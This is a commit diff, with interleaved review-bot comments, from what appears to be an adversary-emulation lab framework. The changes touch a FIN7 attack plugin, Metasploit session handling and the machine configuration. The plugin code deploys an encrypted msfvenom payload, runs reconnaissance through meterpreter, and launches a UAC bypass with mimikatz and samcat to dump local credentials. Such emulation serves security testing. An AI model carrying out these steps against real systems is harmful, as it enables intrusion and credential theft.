Added Metasploit exception.

pull/6/head
Thorsten Sick 3 years ago
parent d36cd2896d
commit 9a25537e99

@ -50,6 +50,14 @@ class MachineConfig():
return self.raw_config["vm_name"] return self.raw_config["vm_name"]
def get_nicknames(self):
""" Gets the nicknames """
if "nicknames" in self.raw_config:
return self.raw_config["nicknames"] or []
return []
def vmcontroller(self): def vmcontroller(self):
""" Returns the vm controller. lowercase """ """ Returns the vm controller. lowercase """
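Review bot: The added get_nicknames does the membership test and the lookup as two steps; `return self.raw_config.get("nicknames") or []` gives the same result in one line. The docstring could also state the contract, for example `""" Returns the list of nicknames for this machine, or an empty list if none are configured """`, because the `or []` silently covers a `nicknames:` key with no entries. Nothing here checks that the configured value is a list, so a scalar in the YAML would be handed to callers as a string; a type check at config load would catch that early.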

@ -20,3 +20,7 @@ class CalderaError(Exception):
class NetworkError(Exception): class NetworkError(Exception):
""" Network connection (like ssh) can not be established """ """ Network connection (like ssh) can not be established """
class MetasploitError(Exception):
""" Metasploit had an error """

@ -6,6 +6,7 @@ from app.attack_log import AttackLog
from app.interface_sfx import CommandlineColors from app.interface_sfx import CommandlineColors
import time import time
import socket import socket
from app.exceptions import MetasploitError
import os import os
@ -79,7 +80,14 @@ class Metasploit():
""" """
# Get_ip can also return a network name. Matching a session needs a real ip # Get_ip can also return a network name. Matching a session needs a real ip
name_resolution_worked = True
try:
ip = socket.gethostbyname(target.get_ip()) ip = socket.gethostbyname(target.get_ip())
except socket.gaierror:
ip = target.get_ip() # Limp on feature if we can not get a name resolution
name_resolution_worked = False
print(f"Name resolution for {target.get_ip()} failed. Sessions are: {self.get_client().sessions.list}")
# TODO: Try to get the ip address from kali system
retries = 100 retries = 100
while retries > 0: while retries > 0:
@ -90,7 +98,7 @@ class Metasploit():
time.sleep(1) time.sleep(1)
retries -= 1 retries -= 1
return None # TODO: Better error handlign as soon as we know where we use it raise MetasploitError(f"Could not find session for {target.get_ip()} Name resolution worked: {name_resolution_worked}")
def meterpreter_execute(self, cmds: [str], session_number: int, delay=0) -> str: def meterpreter_execute(self, cmds: [str], session_number: int, delay=0) -> str:
""" Executes commands on the meterpreter, returns results read from shell """ Executes commands on the meterpreter, returns results read from shell
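Review bot: In the `except socket.gaierror` branch, `ip` is set to the unresolved name, although the comment just above says matching a session needs a real IP. The retry loop that follows (its body is outside this hunk) therefore presumably cannot match and sleeps through all 100 one-second retries before MetasploitError is raised. If the fallback is kept, shorten the wait on that path, e.g. `retries = 100 if name_resolution_worked else 10`. The failure message also goes through `print` and dumps the whole session list; sending it through the project's logger would keep session details out of plain stdout. Since the function now raises instead of returning None, its docstring (outside the hunk) should gain a note that MetasploitError is raised when no session is found, and callers that tested for None need a matching update.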

@ -128,6 +128,9 @@ class FIN7Plugin(AttackPlugin):
# -f C : output is c code # -f C : output is c code
# --encrypt xor : xor encrypt the results # --encrypt xor : xor encrypt the results
# --encrypt-key m : the encryption key # --encrypt-key m : the encryption key
self.attacker_machine_plugin.remote_run("sudo apt install msfpc") # MSFVenom needs to be installed
venom = MSFVenom(self.attacker_machine_plugin, hotelmanager, self.attack_logger) venom = MSFVenom(self.attacker_machine_plugin, hotelmanager, self.attack_logger)
venom.generate_and_deploy(payload=self.payload_type_1, venom.generate_and_deploy(payload=self.payload_type_1,
architecture="x64", architecture="x64",
@ -179,11 +182,10 @@ class FIN7Plugin(AttackPlugin):
f"{CommandlineColors.OKCYAN}Execute arp through meterpreter{CommandlineColors.ENDC}", 1) f"{CommandlineColors.OKCYAN}Execute arp through meterpreter{CommandlineColors.ENDC}", 1)
print(metasploit.meterpreter_execute_on(["arp"], hotelmanager)) print(metasploit.meterpreter_execute_on(["arp"], hotelmanager))
# powershell: nslookup to query domain controler(hoteldc) for ip from ARP (Caldera ?) https://attack.mitre.org/techniques/T1018/ # powershell: nslookup to query domain controler(hoteldc) for ip from ARP (Caldera ?) https://attack.mitre.org/techniques/T1018/
# TODO: Add real <itadmin> ip. Re-activate. This command caused trouble afterwards (uploading mimikatz). Maybe it is because of an error # TODO: Add a new machine in config as <itadmin> ip. Re-activate. This command caused trouble afterwards (uploading mimikatz). Maybe it is because of an error
# itadmin = "127.0.0.1" itadmin = self.get_target_by_name("itadmin")
# self.attack_logger.vprint( self.attack_logger.vprint(f"{CommandlineColors.OKCYAN}Execute nslookup through meterpreter{CommandlineColors.ENDC}", 1)
# f"{CommandlineColors.OKCYAN}Execute nslookup through meterpreter{CommandlineColors.ENDC}", 1) print(metasploit.meterpreter_execute_on([f"execute -f nslookup.exe -H -i -a '{itadmin}'"], hotelmanager))
# print(metasploit.meterpreter_execute_on([f"execute -f nslookup.exe -H -i -a '{itadmin}'"], hotelmanager))
# Copy step 5 attack tools to attacker # Copy step 5 attack tools to attacker
@ -215,7 +217,6 @@ class FIN7Plugin(AttackPlugin):
self.attack_logger.vprint( self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute UAC bypass (and mimikatz) through meterpreter{CommandlineColors.ENDC}", 1) f"{CommandlineColors.OKCYAN}Execute UAC bypass (and mimikatz) through meterpreter{CommandlineColors.ENDC}", 1)
print(metasploit.meterpreter_execute_on([execute_samcats], hotelmanager, delay=20)) print(metasploit.meterpreter_execute_on([execute_samcats], hotelmanager, delay=20))
# TODO: Make it more reliable. Also test which OS versions are working properly. It worked at least once
# samcat.exe: reads local credentials https://attack.mitre.org/techniques/T1003/001/ # samcat.exe: reads local credentials https://attack.mitre.org/techniques/T1003/001/
@ -313,8 +314,8 @@ class FIN7Plugin(AttackPlugin):
self.step1() self.step1()
self.step2() self.step2()
self.step3() # Done and works self.step3() # Done and works
self.step4() self.step4() # Partial - with a hack
self.step5() self.step5() # Done and quite ok
self.step6() self.step6()
self.step7() self.step7()
self.step8() self.step8()
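Review bot: In the re-activated nslookup step, `itadmin = self.get_target_by_name("itadmin")` is interpolated straight into the command as `'{itadmin}'`. If get_target_by_name returns a machine object, as the way `hotelmanager` is passed around suggests, the command receives that object's string form rather than an address. Assuming the target exposes `get_ip()` as the Metasploit helper uses it, the line would read `print(metasploit.meterpreter_execute_on([f"execute -f nslookup.exe -H -i -a '{itadmin.get_ip()}'"], hotelmanager))`. The TODO above still says this command caused trouble afterwards, so that comment should record whether the cause was found before the step runs by default. Separately, the added `remote_run("sudo apt install msfpc")` has no `-y` and may block on the confirmation prompt in a non-interactive session; `sudo apt install -y msfpc` avoids that, and the install would sit better in machine provisioning than in the attack step.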

@ -57,8 +57,10 @@ targets:
vm_name: target2 vm_name: target2
# TODO: itadmin must be moved to another target
nicknames: nicknames:
- hotelmanager - hotelmanager
- itadmin
os: windows os: windows
paw: target2w paw: target2w
